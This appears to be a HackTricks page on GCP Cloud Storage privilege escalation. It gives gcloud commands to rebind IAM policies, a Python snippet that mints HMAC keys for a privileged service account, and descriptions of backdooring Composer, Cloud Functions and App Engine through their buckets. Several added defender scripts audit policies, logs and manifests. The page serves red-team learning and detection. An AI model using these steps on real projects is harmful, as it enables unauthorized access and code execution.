GCP - Storage Privesc
Tip
Learn & practice AWS Hacking:
HackTricks Training AWS Red Team Expert (ARTE)
Learn & practice GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)
Learn & practice Az Hacking: HackTricks Training Azure Red Team Expert (AzRTE)
Support HackTricks
- Check the subscription plans!
- Join the 💬 Discord group or the telegram group or follow us on Twitter 🐦 @hacktricks_live.
- Share hacking tricks by submitting PRs to the HackTricks and HackTricks Cloud github repos.
Storage
Basic Information:
storage.objects.get
This permission allows you to download files stored inside Cloud Storage. It can let you escalate privileges because in some cases sensitive information is stored there. Moreover, some GCP services keep their own data in buckets:
- GCP Composer: When you create a Composer Environment, the code of all the DAGs is stored inside a bucket. These tasks may contain interesting information inside their code.
- GCR (Container Registry): Container images are stored inside buckets, which means that if you can read the buckets you will be able to download the images and search for leaks and/or source code.
storage.objects.setIamPolicy
You can grant yourself the permission to abuse any of the previous scenarios in this section.
# Add binding
gcloud storage objects add-iam-policy-binding gs://<BUCKET_NAME>/<OBJECT_NAME> \
    --member="<MEMBER_TYPE>:<MEMBER_IDENTIFIER>" \
    --role="<ROLE>" \
    --project=<PROJECT_ID>
# Remove binding
gcloud storage objects remove-iam-policy-binding gs://<BUCKET_NAME>/<OBJECT_NAME> \
    --member="<MEMBER_TYPE>:<MEMBER_IDENTIFIER>" \
    --role="<ROLE>" \
    --project=<PROJECT_ID>
# Change Policy (the "-" reads the policy JSON from stdin)
gcloud storage objects set-iam-policy gs://<BUCKET_NAME>/<OBJECT_NAME> - \
    --project=<PROJECT_ID> <<'POLICY'
{
  "bindings": [
    {
      "role": "<ROLE>",
      "members": [
        "<MEMBER_TYPE>:<MEMBER_IDENTIFIER>"
      ]
    }
  ]
}
POLICY
storage.buckets.setIamPolicy
For an example of how to change permissions with this permission, check this page:
# Add binding
gcloud storage buckets add-iam-policy-binding gs://<MY_BUCKET> \
    --member="<MEMBER_TYPE>:<MEMBER_IDENTIFIER>" \
    --role=<ROLE> \
    --project=<MY_PROJECT>
# Remove binding
gcloud storage buckets remove-iam-policy-binding gs://<MY_BUCKET> \
    --member="<MEMBER_TYPE>:<MEMBER_IDENTIFIER>" \
    --role=<ROLE> \
    --project=<MY_PROJECT>
# Change policy (the "-" reads the policy JSON from stdin)
gcloud storage buckets set-iam-policy gs://<BUCKET_NAME> - \
    --project=<PROJECT_ID> <<'POLICY'
{
  "bindings": [
    {
      "role": "<ROLE>",
      "members": [
        "<MEMBER_TYPE>:<MEMBER_IDENTIFIER>"
      ]
    }
  ]
}
POLICY
GCP - Public Buckets Privilege Escalation
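Defender-side check, added here as an example and not part of the original page: given the JSON that `gcloud storage buckets get-iam-policy gs://<BUCKET> --format=json` (or the `objects` variant) returns, flag the bindings that the setIamPolicy abuse above produces: public principals on any role, and admin or read roles handed to principals outside the domains you trust. The sample policy, the trusted-domain set and the role groupings are constructed for the example and are not exhaustive.

```python
# Added example (not from the original page): audit a Cloud Storage IAM policy
# for bindings an attacker holding storage.buckets.setIamPolicy or
# storage.objects.setIamPolicy would typically add. The policy shape is the
# JSON returned by `gcloud storage buckets get-iam-policy ... --format=json`.
import json

# Principals that make the resource readable by everyone / every Google account.
PUBLIC_MEMBERS = {"allUsers", "allAuthenticatedUsers"}

# Roles that let the holder read objects or rewrite the policy itself
# (constructed grouping of well-known predefined roles, not exhaustive).
HIGH_RISK_ROLES = {
    "roles/storage.admin",
    "roles/storage.objectAdmin",
    "roles/storage.legacyBucketOwner",
    "roles/storage.legacyObjectOwner",
}
READ_ROLES = {
    "roles/storage.objectViewer",
    "roles/storage.legacyBucketReader",
    "roles/storage.legacyObjectReader",
}


def member_domain(member: str) -> str:
    """Domain part of a 'user:alice@example.com' style member ('' if there is none)."""
    _, _, ident = member.partition(":")
    return ident.rsplit("@", 1)[-1] if "@" in ident else ""


def audit_policy(policy: dict, trusted_domains: set) -> list:
    """Return one finding dict per risky binding member.

    kinds: 'public'         -> allUsers / allAuthenticatedUsers on any role
           'external-admin' -> admin-level role to a principal outside trusted_domains
           'external-read'  -> read role to a principal outside trusted_domains
    """
    findings = []
    for binding in policy.get("bindings", []):
        role = binding.get("role", "")
        for member in binding.get("members", []):
            if member in PUBLIC_MEMBERS:
                findings.append({"kind": "public", "role": role, "member": member})
                continue
            domain = member_domain(member)
            if domain and domain not in trusted_domains:
                if role in HIGH_RISK_ROLES:
                    kind = "external-admin"
                elif role in READ_ROLES:
                    kind = "external-read"
                else:
                    continue
                findings.append({"kind": kind, "role": role, "member": member})
    return findings


# Constructed sample policy: a bucket after someone granted an outside account
# objectViewer and opened the bucket to allUsers.
SAMPLE_POLICY = json.loads("""
{
  "bindings": [
    {"role": "roles/storage.admin",
     "members": ["serviceAccount:deployer@example-project.iam.gserviceaccount.com"]},
    {"role": "roles/storage.objectViewer",
     "members": ["user:alice@example.com", "user:attacker@evil.example"]},
    {"role": "roles/storage.objectViewer",
     "members": ["allUsers"]}
  ]
}
""")
TRUSTED_DOMAINS = {"example.com", "example-project.iam.gserviceaccount.com"}

if __name__ == "__main__":
    for f in audit_policy(SAMPLE_POLICY, TRUSTED_DOMAINS):
        print(f"{f['kind']:15} {f['role']:32} {f['member']}")
```

To run it against a real bucket, pipe the `get-iam-policy --format=json` output into `json.load(sys.stdin)` and pass your own domain set; the same function works on object-level policies because they share the bindings shape.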
storage.hmacKeys.create
The "interoperability" feature of Cloud Storage, designed for cross-cloud interactions such as AWS S3, involves the creation of HMAC keys for Service Accounts and users. An attacker can exploit this by creating an HMAC key for a Service Account with elevated privileges, thereby escalating privileges within Cloud Storage. While user-associated HMAC keys are only retrievable via the web console, both the access and secret keys remain perpetually accessible, allowing them to be stored as backup access. Conversely, Service Account-linked HMAC keys are accessible via the API, but the access and secret keys are not retrievable after creation, which makes continued access harder.
# Create key
gsutil hmac create <sa-email> # You might need to execute this inside a VM instance

## If you have TROUBLES creating the HMAC key this way you can also do it by contacting the API directly (Python):
import requests
import json

PROJECT_ID = '$PROJECT_ID'
TARGET_SERVICE_ACCOUNT = f"storage-sa@{PROJECT_ID}.iam.gserviceaccount.com"
ACCESS_TOKEN = "$CLOUDSDK_AUTH_ACCESS_TOKEN"
key = requests.post(
    f'https://www.googleapis.com/storage/v1/projects/{PROJECT_ID}/hmacKeys',
    params={'access_token': ACCESS_TOKEN, 'serviceAccountEmail': TARGET_SERVICE_ACCOUNT}
).json()
#print(json.dumps(key, indent=4))
print(f'ID: {key["metadata"]["accessId"]}')
print(f'Secret: {key["secret"]}')

# Configure gsutil to use the HMAC key
gcloud config set pass_credentials_to_gsutil false
gsutil config -a
# Use it
gsutil ls gs://[BUCKET_NAME]
# Restore
gcloud config set pass_credentials_to_gsutil true
Another exploit script for this method can be found here.
storage.objects.create, storage.objects.delete = Storage Write permissions
To create a new object inside a bucket you need storage.objects.create and, according to the docs, you also need storage.objects.delete to modify an existing object.
A very common exploitation of buckets you can write to in the cloud is when the bucket stores web server files: you may be able to store new code that will be used by the web application.
Composer
Composer is Apache Airflow managed inside GCP. It has several interesting features:
- It runs inside a GKE cluster, so the SA the cluster uses is accessible to the code running inside Composer.
- All the components of the Composer environment (DAG code, plugins and data) are stored inside a GCP bucket. If an attacker has read and write permissions over it, they can monitor the bucket and, whenever a DAG is created or updated, submit a backdoored version so that the Composer environment picks up the backdoored version from storage.
You can find a PoC of this attack in the repo: https://github.com/carlospolop/Monitor-Backdoor-Composer-DAGs
Cloud Functions
- Cloud Functions code is stored in Storage, and whenever a new version is created the code is pushed to the bucket and a new container is started from it. Therefore, overwriting the code before the new version is built can make the cloud function execute arbitrary code.
You can find a PoC of this attack in the repo: https://github.com/carlospolop/Monitor-Backdoor-Cloud-Functions
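Detection-side example for the HMAC key, setIamPolicy and bucket-write scenarios above, added here and not part of the original page or the linked PoC repos: a small scanner over Cloud Audit Log entries (JSON, one per line) that alerts on HMAC key creation, IAM policy changes, and writes into buckets whose contents become running code (Composer, Cloud Functions, App Engine staging) by principals that are not the expected deployers. The field names `protoPayload.methodName`, `protoPayload.authenticationInfo.principalEmail` and `protoPayload.resourceName` are the standard audit-log fields; the bucket naming patterns, the allowlist and the log lines themselves are constructed for the example.

```python
# Added example (not from the original page): flag audit-log events that match
# the privilege-escalation paths described in this section.
import json
import re
from typing import Optional

# Buckets whose objects turn into running code. The naming patterns are
# assumptions for this example; adjust them to the real environment.
SENSITIVE_BUCKET_PATTERNS = [
    re.compile(r"^staging\..+\.appspot\.com$"),  # App Engine staging bucket
    re.compile(r"^gcf-v2-sources-.+$"),           # Cloud Functions source bucket (assumed naming)
    re.compile(r"^.+-[a-f0-9]{8}-bucket$"),       # Composer environment bucket (assumed naming)
]

WRITE_METHODS = {"storage.objects.create", "storage.objects.update", "storage.objects.rewriteTo"}
IAM_METHODS = {"storage.setIamPermissions"}
HMAC_METHODS = {"storage.hmacKeys.create"}

BUCKET_RE = re.compile(r"^projects/_/buckets/([^/]+)")


def bucket_of(resource_name: str) -> str:
    """Extract the bucket from a resourceName like projects/_/buckets/<b>/objects/<o>."""
    m = BUCKET_RE.match(resource_name or "")
    return m.group(1) if m else ""


def is_sensitive_bucket(name: str) -> bool:
    return any(p.match(name) for p in SENSITIVE_BUCKET_PATTERNS)


def classify(entry: dict, trusted_writers: set) -> Optional[str]:
    """Return an alert string for one audit-log entry, or None if it is benign."""
    payload = entry.get("protoPayload", {})
    method = payload.get("methodName", "")
    principal = payload.get("authenticationInfo", {}).get("principalEmail", "")
    resource = payload.get("resourceName", "")
    if method in HMAC_METHODS:
        # Every HMAC key creation deserves a look: it mints long-lived S3-style credentials.
        return f"hmac-key-created by {principal}"
    if method in IAM_METHODS:
        return f"iam-policy-changed on {resource} by {principal}"
    if method in WRITE_METHODS:
        if is_sensitive_bucket(bucket_of(resource)) and principal not in trusted_writers:
            return f"untrusted-write to {resource} by {principal}"
    return None


def scan(log_lines: list, trusted_writers: set) -> list:
    """Run classify() over JSON-per-line audit log entries and collect the alerts."""
    alerts = []
    for line in log_lines:
        alert = classify(json.loads(line), trusted_writers)
        if alert is not None:
            alerts.append(alert)
    return alerts


def _entry(method: str, principal: str, resource: str) -> str:
    """Build a constructed audit-log line carrying only the fields this scanner reads."""
    return json.dumps({"protoPayload": {
        "methodName": method,
        "authenticationInfo": {"principalEmail": principal},
        "resourceName": resource}})


# Constructed sample log: one benign read, then the actions this page describes.
SAMPLE_LOG = [
    _entry("storage.objects.get", "alice@example.com",
           "projects/_/buckets/public-site/objects/index.html"),
    _entry("storage.hmacKeys.create", "intern@example.com", "projects/example-project"),
    _entry("storage.setIamPermissions", "intern@example.com", "projects/_/buckets/backup-bucket"),
    _entry("storage.objects.create", "deployer@example-project.iam.gserviceaccount.com",
           "projects/_/buckets/gcf-v2-sources-123456-us-central1/objects/fn/function-source.zip"),
    _entry("storage.objects.create", "intern@example.com",
           "projects/_/buckets/gcf-v2-sources-123456-us-central1/objects/fn/function-source.zip"),
    _entry("storage.objects.update", "intern@example.com",
           "projects/_/buckets/us-central1-prod-abc12345-bucket/objects/dags/etl.py"),
]
TRUSTED_WRITERS = {"deployer@example-project.iam.gserviceaccount.com"}

if __name__ == "__main__":
    for alert in scan(SAMPLE_LOG, TRUSTED_WRITERS):
        print(alert)
```

Object-level `storage.objects.*` events only appear if Data Access audit logs are enabled for Cloud Storage; without them the write alerts never fire, while the HMAC and IAM events are Admin Activity logs and are always recorded.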
App Engine
AppEngine versions generate data inside a bucket with the name format staging.<project-id>.appspot.com. Inside this bucket it is possible to find a folder called ae which contains a folder for each version of the AppEngine app, and inside those folders you will find the manifest.json file. This file contains a JSON list of all the files used to build that specific version. Moreover, it lists the real names of the files, their URLs inside the GCP bucket (files inside the bucket are renamed to their sha1 hash) and the sha1 hash of each file.
Note that it’s not possible to pre-takeover this bucket because GCP users aren’t authorized to generate buckets using the domain name appspot.com.
However, with read & write permissions over this bucket, it is possible to escalate privileges to the SA attached to the App Engine version by monitoring the bucket and, whenever a change is made (new version), modifying the new version as fast as possible. This way, the container created from this code will run the backdoored code.
The mentioned attack can be performed in many different ways, all of which start by monitoring the staging.<project-id>.appspot.com bucket:
- Upload the complete code of a new AppEngine version to a different bucket you can access and prepare a manifest.json file with the new bucket name and the sha1 hashes of those files. Then, when a new version is created inside the staging bucket, you only need to replace the manifest.json file with the backdoored one.
- Upload a modified requirements.txt that pulls in malicious dependencies and update manifest.json with the new file name, URL and hash.
- Upload a modified main.py or app.yaml that executes the backdoored code and update manifest.json with the new file name, URL and hash.
You can find a PoC of this attack in the repo: https://github.com/carlospolop/Monitor-Backdoor-AppEngine
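The three variants above all leave a trace in manifest.json: either an entry whose URL points outside the staging bucket, or an entry whose object content no longer hashes to the sha1 the manifest claims. The following integrity check, added here as an example and not part of the original page or the linked PoC repo, verifies both conditions for every entry. The manifest field names `sourceUrl` and `sha1Sum`, the object-fetching callback and all sample files are assumptions constructed for the example.

```python
# Added example (not from the original page): verify an App Engine staging
# manifest.json against the objects it references. Catches (1) entries that
# point to a bucket other than staging.<project>.appspot.com and (2) objects
# whose bytes do not match the sha1 recorded in the manifest.
import hashlib
from urllib.parse import urlparse


def expected_bucket(project_id: str) -> str:
    return f"staging.{project_id}.appspot.com"


def parse_gcs_url(url: str):
    """Split https://storage.googleapis.com/<bucket>/<object> into (bucket, object)."""
    u = urlparse(url)
    if u.scheme != "https" or u.netloc != "storage.googleapis.com":
        return None, None
    bucket, _, obj = u.path.lstrip("/").partition("/")
    return bucket, obj


def verify_manifest(manifest: dict, project_id: str, fetch) -> list:
    """Return a list of problems; an empty list means every entry checks out.

    manifest: {filename: {"sourceUrl": ..., "sha1Sum": ...}}  (assumed field names)
    fetch(bucket, object) -> bytes or None                      (caller-supplied)
    """
    problems = []
    want_bucket = expected_bucket(project_id)
    for filename, meta in manifest.items():
        bucket, obj = parse_gcs_url(meta.get("sourceUrl", ""))
        if bucket != want_bucket:
            problems.append(f"{filename}: sourceUrl points outside {want_bucket} ({bucket})")
            continue
        claimed = meta.get("sha1Sum", "")
        # Objects in the staging bucket are named by their sha1 hash (see the text above).
        if obj != claimed:
            problems.append(f"{filename}: object name {obj} != sha1Sum {claimed}")
        data = fetch(bucket, obj)
        if data is None:
            problems.append(f"{filename}: object {obj} missing")
            continue
        actual = hashlib.sha1(data).hexdigest()
        if actual != claimed:
            problems.append(f"{filename}: content sha1 {actual} != manifest {claimed}")
    return problems


def sha1(data: bytes) -> str:
    return hashlib.sha1(data).hexdigest()


# --- constructed sample data ---------------------------------------------------
PROJECT = "example-project"
GOOD_MAIN = b"def app(environ, start_response):\n    start_response('200 OK', [])\n    return [b'ok']\n"
GOOD_YAML = b"runtime: python39\n"
# Same object name as GOOD_MAIN in the bucket, but different bytes (constructed tampering).
TAMPERED_MAIN = GOOD_MAIN + b"# constructed tampering marker\n"

# In-memory stand-in for the bucket: {(bucket, object_name): bytes}
OBJECTS = {
    (expected_bucket(PROJECT), sha1(GOOD_MAIN)): TAMPERED_MAIN,  # overwritten in place
    (expected_bucket(PROJECT), sha1(GOOD_YAML)): GOOD_YAML,
}

MANIFEST = {
    "main.py": {"sourceUrl": f"https://storage.googleapis.com/{expected_bucket(PROJECT)}/{sha1(GOOD_MAIN)}",
                "sha1Sum": sha1(GOOD_MAIN)},
    "app.yaml": {"sourceUrl": f"https://storage.googleapis.com/{expected_bucket(PROJECT)}/{sha1(GOOD_YAML)}",
                 "sha1Sum": sha1(GOOD_YAML)},
    # Entry redirected to a bucket outside the project's staging bucket.
    "requirements.txt": {"sourceUrl": "https://storage.googleapis.com/other-bucket/deadbeef",
                         "sha1Sum": "deadbeef"},
}


def fetch_from_memory(bucket: str, obj: str):
    return OBJECTS.get((bucket, obj))


if __name__ == "__main__":
    for problem in verify_manifest(MANIFEST, PROJECT, fetch_from_memory):
        print(problem)
```

In a real deployment the `fetch` callback would read the object with the storage client and the check would run before (or as a gate on) the version being promoted; a manifest that passes but whose app still misbehaves points at a problem outside the staging bucket.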
GCR
- Google Container Registry stores images inside buckets; if you can write to those buckets you may be able to move laterally to wherever those images are run.
- The bucket used by GCR has a URL similar to gs://<eu/usa/asia/nothing>.artifacts.<project>.appspot.com (the top level subdomains are specified here).
Tip
This service is deprecated, so this attack no longer applies. Moreover, Artifact Registry, the service that replaces it, does not store images in buckets.